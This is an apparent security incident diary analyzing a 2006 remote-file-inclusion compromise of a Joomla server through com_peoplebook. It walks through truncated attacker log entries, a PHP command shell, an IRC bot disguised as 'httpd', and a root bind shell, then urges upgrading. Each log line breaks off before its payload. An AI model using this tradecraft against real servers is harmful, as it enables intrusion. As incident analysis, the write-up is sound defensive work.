As reported in a couple of previous diaries (http://isc.sans.org/diary.php?storyid=1483 & 1480 ), less than adequate input validation resulted in a fair few attacks against Joomla and Mambo components. Joomla is a powerful open-source Content Management System written in php. Yesterday we received word of another attack, this time against com_peoplebook.
Here are a few of the httpd log entries that we were provided, suitably sanitized at the hosting provider's request. Note the timelag between log entries - there was a living human at the other end of the wire manually manipulating this server.
xxx.xx.108.22 - - [27/Jul/2006:20:52:47 -0400] "GET /administrator/components/com_peoplebook/The remote file cmd.txt that is included as new "configuration" info contains the necessary php to use either the "system", "passthru" or "exec" functions to execute arbitrary code on the target machine, and provide lots of other nifty capabilities such as local exploits, an email spoofer, a fixed-range portscanner, etc. Here, the attacker merely checks the user ID that the webserver is running as. The HTTP result of 200 indicates success.
xxx.xx.108.22 - - [27/Jul/2006:20:53:09 -0400] "GET /administrator/components/com_peoplebook/
Our attacker, let's call him Ricky, leaves his calling card in the form of a new htm file. First, he tries to get to a location that is writable by the webserver and likely fails, as he tries again after going up one more level:
xxx.xx.108.22 - - [27/Jul/2006:20:53:24 -0400] "GET /administrator/components/com_peoplebook/OK, now that the most important stuff is out of the way, Ricky builds his bot:
xxx.xx108.22 - - [27/Jul/2006:20:54:03 -0400] "GET /administrator/components/com_peoplebook/He pulls down his tarball, mech.tar, which contains an old reliable IRC bot, EnergyMech version 2.8, compiled back in 2001. Along with it was a config file & a number of scripts to do nasti things upon command in the IRC channel that it joins. A simple packet flooder, Perl-based shell shoveler, log wiper,etc. Note the name he gives his bot, httpd. Would you noticed an extra httpd entry in your ps list? Apache, by default, forks off 10 of them at startup and more as needed. This simple technique can be very effective against casual sysadmin review.
xxx.xx.108.22 - - [27/Jul/2006:20:56:08 -0400] "GET /administrator/components/com_peoplebook/Ricky, now wanting to really give himself away, starts up a persistent listener that gives anyone a root shell if they connect to a fixed port. There is no attempt at hiding this from netstat, although plenty of userspace and kernel rootkits can do this with their hands tied behind their backs. Bad Ricky. Bad,lazy H4X0r Ricky.
I joke about his lack of sophistication, but he wouldn't keep up this practice if it wasn't successful. There are plenty of vulnerable systems that aren't reviewed carefully by their admins. If you are running Joomla, heed their dev website (http://dev.joomla.org/content/blogcategory/21/86/) posting:
that affect ALL Previous versions of Joomla!1.0.10 contains the following important security fixes:
* 03 High Level Security Fixes * 01 Medium Level Security Fixes * 05 Low Level security * 40+ General bugfixes
If you are using ANY previous version of Joomla!, you need to upgrade to 1.0.10
In addition, be sure to update any third-party components, like com_peoplebook (http://forge.joomla.org/sf/projects/peoplebook), to take advantage of the
security enhancements enabled by the new release of Joomla.
Jul 31st 2006
1 decade ago